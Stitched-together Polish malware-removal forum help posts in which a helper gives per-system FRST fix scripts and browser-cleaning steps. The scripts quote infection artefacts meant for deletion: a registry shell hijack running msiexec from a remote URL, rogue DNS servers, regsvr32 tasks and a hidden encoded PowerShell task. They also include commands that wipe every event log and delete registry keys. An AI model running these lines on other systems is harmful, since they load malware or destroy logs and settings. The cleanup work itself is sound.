FFFA650F2CB2ABC0D80527B524DD3F9FC172C138 (Doctor Web Ltd.) HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia HKU\S-1-5-21-478647955-3472351390-1182581596-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i hxxp://point.orangeiloveyou.com/?data=zDlkMj1LNTU4MdhWFdRYFTM8FjF2MYZQNjQLOYI5MUFyFkM8RF== /q HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] GroupPolicy: Ograniczenia Tcpip\Parameters: [NameServer] 82.163.143.176 82.163.142.178 Tcpip\..\Interfaces\{8EF21497-7361-4F1C-A09C-A9A671FA6743}: [NameServer] 82.163.143.176 82.163.142.178 Toolbar: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> Brak nazwy - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - Brak pliku HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB HKU\S-1-5-21-478647955-3472351390-1182581596-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} SearchScopes: HKU\S-1-5-21-478647955-3472351390-1182581596-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.mylucky123.com/search/?type=ds&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB&q={searchTerms} CHR HomePage: Default -> hxxp://www.mylucky123.com/?type=hp&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] R2 WinCacheSrv; C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp [205826 ] () [brak podpisu cyfrowego] C:\ProgramData\Package Cache\{E01CB7F1-3E88-4450-1764-B3CC1E205C4A}v10.1.14393.795\Installers\30daf459e79c5d26366654b1b482e87.cab:dp S2 CornerSunshineSvc; "C:\Program Files (x86)\Corner Sunshine\CornerSunshineSvc.exe" {8A712DBD-E08B-4D5C-839D-1B9C185FE769} [X] 2018-01-24 11:05 - 2016-10-21 14:12 - 000000000 _____ C:\Users\Public\Documents\report.dat 2018-01-24 11:03 - 2016-09-29 09:51 - 000001195 _____ C:\Users\Public\Documents\temp.dat 2018-01-19 13:55 - 2016-10-21 14:12 - 000000000 ____D C:\ProgramData\fjcfi 2018-01-19 13:55 - 2016-10-21 13:44 - 000000000 ____D C:\ProgramData\chuvc 2017-12-27 19:59 - 2017-12-29 20:59 - 000000068 _____ () C:\Users\administratorka\AppData\Local\YdozKPUZep C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Picasa 3.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\DriverDoc.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DriverDoc\Register DriverDoc.lnk C:\Users\administratorka\Desktop\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Mozilla Firefox (2).lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk C:\Users\Public\Desktop\Mozilla Firefox.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\administratorka\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk ShortcutWithArgument: C:\Users\administratorka\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\theHunter\theHunter.lnk -> D:\theHunter\launcher\launcher.exe (Expansive Worlds) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox (Safe Mode).lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.mylucky123.com/?type=sc&ts=1476176082&z=5a5e095b84e47c2131f1dc1g1z5mdqdgem4q2e5b3c&from=che0812&uid=ST1000DM003-1SB10C_Z9A2CATBXXXXZ9A2CATB CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\administratorka\AppData\Local CMD: dir /a C:\Users\administratorka\AppData\LocalLow CMD: dir /a C:\Users\administratorka\AppData\Roaming CMD: netsh advfirewall reset CMD: ipconfig /flushdns Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Po tej akcji zniknęły skróty przeglądarek - odtwórz je. 4. Przeglądarka Mozilla FireFox padła ofiarą adware podstawiającego fałszywe profile - wymagana jest ich kompleksowa wymiana.Kliknij klawisz + R > wklej komendę "C:\Program files (x86)\Mozilla Firefox\firefox.exe" -p > załóż nowy profil, wszystkie poprzednie skasuj. 5. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. Ustaw tą przeglądarkę jako domyślną, aby cofnąć modyfikacje infekcji. 6. Uruchom FRST, w polu Szukaj (Search) wklej poniższą frazę i kliknij w Szukaj w rejestrze (Search Registry). cupduck;firefox Obok FRST powstanie raport SearchReg.txt - zaprezentuj go na forum. 7. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Temat zgłoszony jako wciąż aktualny, więc odpowiadam. Byłem na urlopie - stąd długi czas odpowiedzi. Raporty nie wykazują oznak infekcji. Temat przenoszę do działu Windows 7, gdzie będzie prowadzona dalsza pomoc. W spoilerze zadaję działania poboczne do wykonania (kosmetyka systemowa). Poproszę o raport z zakładki System Summary w HWINFO oraz CrystalDiskInfo, załącz także raport podstawowych informacji z narzędzi systemowych - Zarządzanie dyskami.

System jest zainfekowany, ale niestety nie tylko system. Widoczna jest infekcja adresów DNS routera - obydwa są izraelski (często widziane tu na forum jako infekcyjne) - KLIK / KLIK. Wracają zaś do systemu to w Harmonogramie zadań ulokowała się infekcja bezplikowa (ciąg komend zakodowanych w PowerShell) oraz dwie inne (mogą być winowajcami obciążenia procesów i okienek CMD). W pliku Hosts widoczna infekcyjna strona - resetuje go. P.S: W lokalizacji ProgramData widoczne jest multum podejrzanych folderów - są dwa "typy" w budowie. W skrypcie pobieram informację o nich. 1. Start > Panel Sterowania > System i zabezpieczenia > System > Z bocznego panelu wybierz Ochrona systemu > Sekcja Ustawienia ochrony > Wybierz dysk C > Kliknij Konfiguruj > Sekcja Przywróć Ustawienia > Zmień z Wyłącz ochronę systemu na Przywróć ustawienia systemu oraz poprzednie wersje plików > kliknij Zastosuj, a następnie OK. Ta akcja umożliwi mi stworzenie punktu przywracania na wypadek wystąpienia awarii. 2. Przez Panel Sterownia odinstaluj adware / PUP: ProxyGate version 3.0.0.1180. 3. Zaloguj się do routera: Zmień ustawienia DNS. Jeśli nie wiesz na jakie, możesz ustawić adresy Google: 8.8.8.8 + 8.8.4.4 Zabezpiecz router: zmień hasło oraz zamknij dostęp do panelu zarządzania od strony Internetu. Porównaj z tymi artykułami: KLIK, KLIK. Po konfiguracji uruchom ten test mający potwierdzić zabezpieczenie: KLIK. Dopiero gdy router zostanie wyczyszczony i zabezpieczony: 4. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku Task: {1FC2DACF-16BE-4F74-889C-A13E339BFF12} - System32\Tasks\{DB337D69-FE16-8C41-687B-9E56CF303332} => C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\796129af\5de30529.dll" Task: {AD095881-766F-4E70-8534-8C0DE5353236} - System32\Tasks\4EB3A5BA-6684-6004-CA2C-F0A296C496D1 => C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/0a1d2a2a4fd19047 /q" "C:\Users\karol\AppData\Local\AD33A5~1\{5DE30~1." Task: {E2CDFE93-E422-44C9-9D11-DABA20BD9223} - System32\Tasks\{0F7E7847-0B0F-0A78-0511-7A790D0A1104} => C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ADsAIAA7ACAAIAA7ADsAOwAgADsAOwA7ACAAIAA7ADsAOwA7ADsAOwAgACAAOwAgACAAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIA (dane wartości zawierają 9668 znaków więcej). Task: {F348C0BA-AF39-41F4-B836-E927B60AD514} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku C:\PROGRA~3\796129af C:\Users\karol\AppData\Local\AD33A5~1 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VCDS\Logs Folder.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VCDS\UnInstall.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VCDS\VC-Scope.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VCDS\VCDS Release 12.12.lnk SearchScopes: HKU\S-1-5-21-1001290168-2904822511-823766712-1001 -> DefaultScope {E1BCE238-BB86-4CBA-A110-5F7C92E4789A} URL = SearchScopes: HKU\S-1-5-21-1001290168-2904822511-823766712-1001 -> {C2FBABE7-B934-4A6A-93EB-65B93573B4CA} URL = S2 HuaweiHiSuiteService64.exe; "C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe" -/service [X] Tcpip\..\Interfaces\{42641943-f36e-49e3-bfd0-4d4b2e7fb115}: [NameServer] 82.163.143.176 82.163.142.178 Tcpip\..\Interfaces\{558a6eb2-532d-48fb-b789-32dc69d4d1b2}: [NameServer] 82.163.143.176 82.163.142.178 Tcpip\..\Interfaces\{e9bb84a4-b039-4307-a252-ae0911dda439}: [NameServer] 82.163.143.176 82.163.142.178 Folder: C:\ProgramData\569e7b68-5e51-0 Folder: C:\ProgramData\569e7b68-7271-1 Folder: C:\ProgramData\{9BB60BA6-2C1D-BC0D-DEFE-3CF62F162F31| Folder: C:\ProgramData\{3AC24ABC-8D69-FD17-94EA-434055222EAB} CMD: ipconfig /flushdns CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\karol\AppData\Local CMD: dir /a C:\Users\karol\AppData\LocalLow CMD: dir /a C:\Users\karol\AppData\Roaming Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 5. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 6. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition i Shortcut. Dołącz też plik fixlog.txt.

Miło mi, że moja pomoc okazała się przydatna! Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Wszystko poszło gładko, infekcja usunięta. Proszę powiedz, jak podsumowujesz obecną sytuację?

Wszystko pomyślnie wykonane - prawie wszystko związane z infekcją usunięte, aczkolwiek w przeglądarce Google Chrome nadal widać mail.ru (mam nadzieję, że jak usunę to przez skrypt to akcja się powiedzie - inaczej odwałamy się do reinstalacji). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CHR HomePage: Default -> inline.go.mail.ru CHR StartupUrls: Default -> "hxxp://google.com/","hxxp://mail.ru/cnt/10445?gp=811138" CHR DefaultSearchURL: Default -> hxxps://inline.go.mail.ru/search?inline_comp=dse&q={searchTerms}&fr=chxtn12.0.23 CHR DefaultSearchKeyword: Default -> inline.go.mail.ru CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Zrób nowy log FRST z opcji Skanuj (Scan), ale już bez Addition i Shortcut. Dołącz też plik fixlog.txt.

Na przyszłość: z takich akcji na tym forum wymagamy dostarczenia raportów - daje nam to pewny zakres informacji na temat infekcji. W przeglądarce Google Chrome i Internet Explorer rzeczywiście widać rozszerzenia adware, ale i też problematycznego dostawcę wyszukiwarki - mail.ru. Nie widzę jednak modyfikacji w przeglądarce Mozilla FireFox niemniej jednak zadam również jej czyszczenie. Portale z oprogramowaniem / Instalatory - na co uważać 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku ContextMenuHandlers1_S-1-5-21-2412678058-3991403442-3374828277-1001: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ContextMenuHandlers4_S-1-5-21-2412678058-3991403442-3374828277-1001: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku ContextMenuHandlers5_S-1-5-21-2412678058-3991403442-3374828277-1001: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => -> Brak pliku Task: {D82794E2-776F-4AE8-9FCA-326EFEBF6A2C} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku Task: {D9F6C006-5C11-451D-B013-23316F97FE97} - \hlatomernetkolc -> Brak pliku GroupPolicy: Ograniczenia GroupPolicy\User: Ograniczenia SearchScopes: HKU\S-1-5-21-2412678058-3991403442-3374828277-1001 -> DefaultScope {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B869EA21E-8973-4665-A528-86B4C43E6E8E%7D&gp=811142 SearchScopes: HKU\S-1-5-21-2412678058-3991403442-3374828277-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B869EA21E-8973-4665-A528-86B4C43E6E8E%7D&gp=811142 SearchScopes: HKU\S-1-5-21-2412678058-3991403442-3374828277-1001 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = CHR HKU\S-1-5-21-2412678058-3991403442-3374828277-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bhjhnafpiilpffhglajcaepjbnbjemci] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2412678058-3991403442-3374828277-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dijfnbhlogmffhgpelodglnnkncadnbi] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2412678058-3991403442-3374828277-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [hcadgijmedbfgciegjomfpjcdchlhnif] - hxxps://clients2.google.com/service/update2/crx CHR HKU\S-1-5-21-2412678058-3991403442-3374828277-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh] - hxxps://clients2.google.com/service/update2/crx Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Wyczyść przeglądarkę Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj wszystkie nieznane i niepotrzebne Ci rozszerzenia (omawiane szkodliwe zostały usunięte w skrypcie, bo widoczne są tylko z poziomu rejestru). Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko z wyjątkiem Google. 3. Wyczyść przeglądarkę Mozilla FireFox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść historię przeglądania. 4. Ponownie uruchom AdwCleaner z opcji Skanuj (nie stosuj jeszcze Oczyść). Dostarcz raport z tego działania. 5. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

W raportach brak oznak aktywnej infekcji (ale była tu, na co wskazują zaszyfrowane pliki). Czy crack AutoKMS jest celową instalacją? Dla pewności całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. Pliki zostały zaszyfrowane przez infekcje Ransomware, która szyfruje dane w celu wymuszenia haraczu w zamian za ich odzyskanie. Przypuszczalnie jest to CryptXXX 4.0 (na ID Ransomware zidentyfikowano go w oparciu o pudowe rozszerzenia) i w tym wypadku deszyfracja jest awykonalna. Owszem, tę infekcję w starszych wersjach mógł odszyfrować Kaspersky RannohDecryptor (próbowany już przez Ciebie), ale pod warunkiem posiadania oryginalnej niezaszyfrowanej kopii choć jednego pliku który podlegał szyfrowaniu: KLIK / KLIK. Jedyne co pozostaje, to czekać w nadziei (już skopiowałeś pliki na dysk zewnętrzny, więc możesz czekać, programy do ratowania plików są raczej bezużyteczne tu), że ktoś w przyszłości złamie to, choć szanse mogą być bliskie zeru. Nie zmieniaj proszę zaszyfrowanym plikom rozszerzenia. To jest bez sensu i może pogorszyć tylko sprawę (w przyszłości gdy ktoś złamie szyfr i stworzy dekoder pliki mogą zostać nierozpoznane). P.S: Zapytam jeszcze picasso - to ekspertka od złośliwego oprogramowania wyróżniona przez Microsoft czy zgadza się z diagnozą wariantu.

Proszę dostarczyć wymagany zestaw raportów FRST. Dodatkowo (pomimo, że wygląda to na infekcje Rector) wyślij do analizy jeden z zaszyfrowanych plików lub notatkę żądają okup na serwis usługi ID Ransomware i dostarcz wynik w postaci screen'a.

Niestety w przeglądarce Google Chrome nadal widoczna śmieciowa wyszukiwarka mystartsearch, teraz tylko przerzuciła się na inny profil. Wcześniej profilem domyślnym był Profile 2, a teraz jest Profile 3. Obawiam się, że zmiany dotyczą preferencji. Mogę je wyczyścić ręcznie, ale to pracochłonny zabieg. Lepsze efekty da kompleksowa reinstalacja przeglądarki: Upewnij się, że nie masz włączonej synchronizacji, która załaduje złe ustawienia z serwera po reinstalacji przeglądarki: KLIK. Jeśli potrzebne, wyeksportuj zakładki: CTRL+SHIFT+O > Organizuj > Eksportuj zakładki do pliku HTML. Odinstaluj Google Chrome. Przy deinstalacji zaznacz Usuń także dane przeglądarki. Zainstaluj najnowszą stabilną wersję Google Chrome: KLIK. Muszę pomyśleć co teraz będziemy robić, edytuje ten post z następnymi instrukcjami. Skonsultowałem się z picasso, która odpowiedziała poniżej.

Raporty nie wykazują oznak infekcji, widoczna są tylko śladowe ilości adware w przeglądarce Google Chrome. W skrypcie uwzględniam kasacje martwych wpisów i resztek po wcześniej odinstalowanym oprogramowaniu (m.in po przeglądarce Mozilla FireFox). Resetuję również całą gałąź Dziennika zdarzeń, by mieć jak najnowsze dane dot. zdarzeń. Jeśli chodzi zaś o problem tytułowy to problem może być trudno znaleźć. Zaczniemy ogólnikowo od resetu repozytorium WMI. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: Task: {C72FA3BE-EE6A-4607-B44E-20001B1C9807} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = C:\ProgramData\Microsoft\Windows\Start Menu\Programs\##ID_STRING16##\##ID_STRING17##.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\RXVS\AppData\Local\Mozilla C:\Users\RXVSAppData\Roaming\Mozilla C:\Users\RXVS\AppData\Roaming\Profiles Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj 